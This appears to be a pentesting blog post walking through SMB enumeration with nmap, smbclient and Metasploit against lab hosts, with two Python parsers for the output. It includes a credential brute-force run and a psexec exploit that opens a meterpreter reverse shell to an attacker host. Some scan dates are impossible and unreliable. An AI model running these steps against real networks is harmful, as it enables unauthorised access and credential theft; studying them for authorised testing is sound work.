control – smb 445, 137, 139

https://myexploit.wordpress.com/myexploit2600_security_conference_talks/

For the near future I will only be releasing new blogs on this site: https://1337red.wordpress.com/ . myexploit will continue, but please visit 1337red for SE, red teaming and advanced pentesting techniques.

SE remote-to-internal pentesting: how to capture the domain admin https://myexploit.wordpress.com/remote-social-engineering-the-da-trilogy/

root@bt:~# nmap --script smb-enum-shares.nse -p445 IP-Address

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 1478-02-12 09:11 BST
Nmap scan report for IP-Address
Host is up (0.00092s latency).
PORT    STATE SERVICE
445/tcp open  microsoft-ds
MAC Address: 01:02:03:04:05:06 (Micky Systems)

Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access:
|     Current user ('guest') access:
|   C$
|     Anonymous access:
|     Current user ('guest') access:
|   IPC$
|     Anonymous access: READ
|     Current user ('guest') access: READ
|   Printer
|     Anonymous access:
|     Current user ('guest') access: READ
|   SharedDocs
|     Anonymous access:
|     Current user ('guest') access: READ/WRITE
|   Test
|     Anonymous access:
|     Current user ('guest') access: READ
|   print$
|     Anonymous access:
|_    Current user ('guest') access: READ

Nmap done: 1 IP address (1 host up) scanned in 1.52 seconds

——————————————————

root@bt:~# nmap -sU -sS --script smb-enum-shares.nse -p U:137,T:139 IP-Address

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 1478-02-12 09:11 BST
Nmap scan report for IP-Address
Host is up (0.00043s latency).
PORT    STATE SERVICE
139/tcp open  netbios-ssn
137/udp open  netbios-ns
MAC Address: 01:02:03:04:05:06 (Micky Systems)

Host script results:
| smb-enum-shares:
|   ERROR: Enumerating shares failed, guessing at common ones (NT_STATUS_ACCESS_DENIED)
|   ADMIN$
|     Anonymous access:
|   C$
|     Anonymous access:
|   IPC$
|_    Anonymous access: READ

Nmap done: 1 IP address (1 host up) scanned in 1.04 seconds
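To turn runs like the two above into a short triage list (which shares a null or guest session can reach, and which of them are writable), here is a small parser for the smb-enum-shares script output. This is an added example written for this post, not nmap's own code; the sample text is a trimmed, constructed copy of the output above, and it also handles the ACCESS_DENIED case where the script falls back to guessing share names.

```python
import re

# Constructed sample: a trimmed copy of the smb-enum-shares output shown above.
ENUM_SHARES = """\
| smb-enum-shares:
|   ADMIN$
|     Anonymous access:
|     Current user ('guest') access:
|   IPC$
|     Anonymous access: READ
|     Current user ('guest') access: READ
|   SharedDocs
|     Anonymous access:
|     Current user ('guest') access: READ/WRITE
|   print$
|     Anonymous access:
|_    Current user ('guest') access: READ
"""

ACCESS_RE = re.compile(r"^(Anonymous|Current user \('([^']+)'\)) access:\s*(.*)$")

def parse_enum_shares(nse_text):
    """Return ({share: {who: level}}, error) from smb-enum-shares script output.
    An empty level in the output means no access; it is recorded here as 'NONE'."""
    shares, error, current = {}, None, None
    for raw in nse_text.splitlines():
        if not raw.startswith("|"):
            continue                        # not part of the script block
        text = raw.lstrip("|_").strip()     # drop the NSE gutter and indentation
        if text.startswith("smb-enum-shares:"):
            continue
        if text.startswith("ERROR:"):       # e.g. NT_STATUS_ACCESS_DENIED, names are then guessed
            error = text[len("ERROR:"):].strip()
            continue
        m = ACCESS_RE.match(text)
        if m and current is not None:
            who = "anonymous" if m.group(1) == "Anonymous" else m.group(2)
            shares[current][who] = m.group(3).strip() or "NONE"
        elif text:
            current = text                  # a share name line
            shares[current] = {}
    return shares, error

def exposed_shares(shares):
    """List (share, who, level, writable) for every share reachable without real credentials.
    IPC$ READ over a null session is the usual baseline; anything writable is the priority."""
    out = []
    for name in sorted(shares):
        for who, level in shares[name].items():
            if level != "NONE":
                out.append((name, who, level, "WRITE" in level))
    return out
```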

——————————————————

Manually testing anonymous SMB access from BackTrack 5 R1

root@bt:~# /usr/bin/smbclient -L IP-Address
Enter root's password: (enter the password if you know it, or just press Enter for an anonymous session)
Domain=[TEST] OS=[Windows 5.1] Server=[Windows 2000 LAN Manager]

Sharename       Type      Comment
---------       ----      -------
IPC$            IPC       Remote IPC
print$          Disk      Printer Drivers
SharedDocs      Disk
Test            Disk
ADMIN$          Disk      Remote Admin
C$              Disk      Default share
Printer         Printer   Microsoft XPS Document Writer
session request to IP-Address failed (Called name not present)
session request to 10 failed (Called name not present)
Domain=[TEST] OS=[Windows 5.1] Server=[Windows 2000 LAN Manager]

Server               Comment
---------            -------

Workgroup            Master
---------            -------

——————————————————

msf > use scanner/smb/smb_login
msf  auxiliary(smb_login) > set rhosts IP-Address
msf  auxiliary(smb_login) > set SMBUser admin
msf  auxiliary(smb_login) > set SMBPass password
msf  auxiliary(smb_login) > run

[*] IP-Address:445 SMB - Starting SMB login bruteforce
[-] IP-Address - This system allows guest sessions with any credentials, these instances will not be reported.
[*] IP-Address - GUEST LOGIN (Windows 5.1) admin :
[*] IP-Address - GUEST LOGIN (Windows 5.1) admin : admin
[*] IP-Address - GUEST LOGIN (Windows 5.1) admin : password
[*] IP-Address - GUEST LOGIN (Windows 5.1) administrator :
[*] IP-Address - GUEST LOGIN (Windows 5.1) administrator : administrator
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

NOTE

Seeing GUEST LOGIN (Windows 5.1) admin : password means there is no domain: the host maps any credentials onto the GUEST account, so the username and password were never actually validated.
If you see SUCCESSFUL LOGIN (Windows 5.1) 'username' : 'password' (with a real username and password), the host is on a domain and the credentials are valid, and you can go on to try and exploit.
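The distinction in the note above is easy to lose when smb_login output scrolls past, so here is a small triage helper that separates validated credentials from hosts that merely map every login to GUEST (which is itself a misconfiguration worth reporting). This is an added example written for this post, not Metasploit code; the sample output is constructed from the run above plus one made-up SUCCESSFUL LOGIN line on a second host, with invented addresses and credentials.

```python
import re

# Constructed sample: the smb_login run above plus one validated line on a second host,
# so both outcomes appear. Hosts, users and passwords are made up.
SMB_LOGIN_OUTPUT = """\
[*] 192.0.2.10:445 SMB - Starting SMB login bruteforce
[-] 192.0.2.10 - This system allows guest sessions with any credentials, these instances will not be reported.
[*] 192.0.2.10 - GUEST LOGIN (Windows 5.1) admin :
[*] 192.0.2.10 - GUEST LOGIN (Windows 5.1) admin : admin
[*] 192.0.2.10 - GUEST LOGIN (Windows 5.1) administrator : administrator
[+] 192.0.2.11 - SUCCESSFUL LOGIN (Windows 5.1) 'backup' : 'Winter2012'
[*] Scanned 2 of 2 hosts (100% complete)
"""

LOGIN_RE = re.compile(
    r"^\[[*+]\] (?P<host>[\d.]+)(?::\d+)? - (?P<kind>GUEST LOGIN|SUCCESSFUL LOGIN) "
    r"\((?P<os>[^)]*)\) '?(?P<user>[^' :]*)'? :\s*'?(?P<pw>[^']*)'?$"
)
GUEST_MAP_RE = re.compile(r"^\[-\] (?P<host>[\d.]+)(?::\d+)? - This system allows guest sessions")

def triage_smb_login(output):
    """Separate validated credentials from hosts that map every login to GUEST.
    Returns (validated, guest_mapped): validated is [(host, user, password)];
    guest_mapped is the sorted list of hosts where a GUEST LOGIN line proves nothing."""
    validated, guest_mapped = [], set()
    for line in output.splitlines():
        g = GUEST_MAP_RE.match(line)
        if g:                                   # module's own warning about guest mapping
            guest_mapped.add(g.group("host"))
            continue
        m = LOGIN_RE.match(line)
        if not m:
            continue
        if m.group("kind") == "GUEST LOGIN":    # credential was never checked
            guest_mapped.add(m.group("host"))
        else:                                   # real account and password accepted
            validated.append((m.group("host"), m.group("user"), m.group("pw")))
    return validated, sorted(guest_mapped)
```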

msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set rhost remote-IP-Address
msf exploit(psexec) > set smbuser username
msf exploit(psexec) > set smbpass password
msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp
msf exploit(psexec) > set lhost local-IP-Address
msf exploit(psexec) > exploit

——————————————————

smb_enumusers metasploit

The smb_enumusers scanner will connect to each system via the SMB RPC service and enumerate the users on the system.

msf > use auxiliary/scanner/smb/smb_enumusers
msf auxiliary(smb_enumusers) > set rhosts IP-Address
msf auxiliary(smb_enumusers) > run

[*] IP-Address METASPLOITABLE [ games, nobody, bind, proxy, syslog, user, www-data, root, news, postgres, bin, mail, distccd, proftpd, dhcp, daemon, sshd, man, lp, mysql, gnats, libuuid, backup, msfadmin, telnetd, sys, klog, postfix, service, list, irc, ftp, tomcat55, sync, uucp ] ( LockoutTries=0 PasswordMin=5 )
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

———————————————–

smb_enumusers nmap

root@bt:~# nmap --script smb-enum-users.nse -p 445 IP-Address

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 1492-02-30 11:13 BST
Nmap scan report for IP-Address
Host is up (0.00051s latency).
PORT    STATE SERVICE
445/tcp open  microsoft-ds
MAC Address: 08:00:27:EB:18:CC (Cadmus Computer Systems)

Host script results:
| smb-enum-users:
|   METASPLOITABLE\backup (RID: 1068)
|     Full name: backup
|     Flags: Account disabled, Normal user account
|   METASPLOITABLE\bin (RID: 1004)
|     Full name: bin
|     Flags: Account disabled, Normal user account
|   METASPLOITABLE\bind (RID: 1210)
|     Flags: Account disabled, Normal user account
|   METASPLOITABLE\daemon (RID: 1002)
|     Full name: daemon
|     Flags: Account disabled, Normal user account
|   METASPLOITABLE\dhcp (RID: 1202)
|     Flags: Account disabled, Normal user account
|   METASPLOITABLE\distccd (RID: 1222)
|     Flags: Account disabled, Normal user account
|   METASPLOITABLE\ftp (RID: 1214)
|     Flags: Account disabled, Normal user account
|   METASPLOITABLE\games (RID: 1010)
|     Full name: games
|     Flags: Account disabled, Normal user account
|   METASPLOITABLE\gnats (RID: 1082)
|     Full name: Gnats Bug-Reporting System (admin)
|     Flags: Account disabled, Normal user account
|   METASPLOITABLE\irc (RID: 1078)
|     Full name: ircd
|     Flags: Account disabled, Normal user account
|   METASPLOITABLE\klog (RID: 1206)
|     Flags: Account disabled, Normal user account
|   METASPLOITABLE\libuuid (RID: 1200)
|     Flags: Account disabled, Normal user account
|   METASPLOITABLE\list (RID: 1076)
|     Full name: Mailing List Manager
|     Flags: Account disabled, Normal user account
|   METASPLOITABLE\lp (RID: 1014)
|     Full name: lp
|     Flags: Account disabled, Normal user account
|   METASPLOITABLE\mail (RID: 1016)
|     Full name: mail
|     Flags: Account disabled, Normal user account
|   METASPLOITABLE\man (RID: 1012)
|     Full name: man
|     Flags: Account disabled, Normal user account
|   METASPLOITABLE\msfadmin (RID: 3000)
|     Full name: msfadmin,,,
|     Flags: Normal user account
|   METASPLOITABLE\mysql (RID: 1218)
|     Full name: MySQL Server,,,
|     Flags: Account disabled, Normal user account
|   METASPLOITABLE\news (RID: 1018)
|     Full name: news
|     Flags: Account disabled, Normal user account
|   METASPLOITABLE\nobody (RID: 501)
|     Full name: nobody
|     Flags: Account disabled, Normal user account
|   METASPLOITABLE\postfix (RID: 1212)
|     Flags: Account disabled, Normal user account
|   METASPLOITABLE\postgres (RID: 1216)
|     Full name: PostgreSQL administrator,,,
|     Flags: Account disabled, Normal user account
|   METASPLOITABLE\proftpd (RID: 1226)
|     Flags: Account disabled, Normal user account
|   METASPLOITABLE\proxy (RID: 1026)
|     Full name: proxy
|     Flags: Account disabled, Normal user account
|   METASPLOITABLE\root (RID: 1000)
|     Full name: root
|     Flags: Account disabled, Normal user account
|   METASPLOITABLE\service (RID: 3004)
|     Full name: ,,,
|     Flags: Account disabled, Normal user account
|   METASPLOITABLE\sshd (RID: 1208)
|     Flags: Account disabled, Normal user account
|   METASPLOITABLE\sync (RID: 1008)
|     Full name: sync
|     Flags: Account disabled, Normal user account
|   METASPLOITABLE\sys (RID: 1006)
|     Full name: sys
|     Flags: Account disabled, Normal user account
|   METASPLOITABLE\syslog (RID: 1204)
|     Flags: Account disabled, Normal user account
|   METASPLOITABLE\telnetd (RID: 1224)
|     Flags: Account disabled, Normal user account
|   METASPLOITABLE\tomcat55 (RID: 1220)
|     Flags: Account disabled, Normal user account
|   METASPLOITABLE\user (RID: 3002)
|     Full name: just a user,111,,
|     Flags: Normal user account
|   METASPLOITABLE\uucp (RID: 1020)
|     Full name: uucp
|     Flags: Account disabled, Normal user account
|   METASPLOITABLE\www-data (RID: 1066)
|     Full name: www-data
|_    Flags: Account disabled, Normal user account

Nmap done: 1 IP address (1 host up) scanned in 0.29 seconds

———————————————–

msf > use auxiliary/scanner/smb/smb_enumshares
msf auxiliary(smb_enumshares) > set rhosts IP-Address
msf auxiliary(smb_enumshares) > run

[*] IP-Address:139 print$ – Printer Drivers (DISK), tmp – oh noes! (DISK), opt – (DISK), IPC$ – IPC Service (metasploitable server (Samba 3.0.20-Debian)) (IPC), ADMIN$ – IPC Service (metasploitable server (Samba 3.0.20-Debian)) (IPC)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

———————————————–

root@bt:~# nmap --script smb-enum-shares.nse -p445 IP-Address

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 1492-02-30 11:16 BST
Nmap scan report for IP-Address
Host is up (0.00038s latency).
PORT    STATE SERVICE
445/tcp open  microsoft-ds
MAC Address: 08:00:27:EB:18:CC (Cadmus Computer Systems)

Nmap done: 1 IP address (1 host up) scanned in 0.24 seconds

———————————————–

msf > use auxiliary/scanner/smb/smb2
msf auxiliary(smb2) > set rhosts IP-Address
msf auxiliary(smb2) > set THREADS 16
msf auxiliary(smb2) > run

———————————————–

msf > use auxiliary/scanner/smb/smb_version
msf auxiliary(smb_version) > set rhosts IP-Address
rhosts => IP-Address
msf auxiliary(smb_version) > run

[*] IP-Address:445 is running Unix Samba 3.0.20-Debian (language: Unknown) (domain:WORKGROUP)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
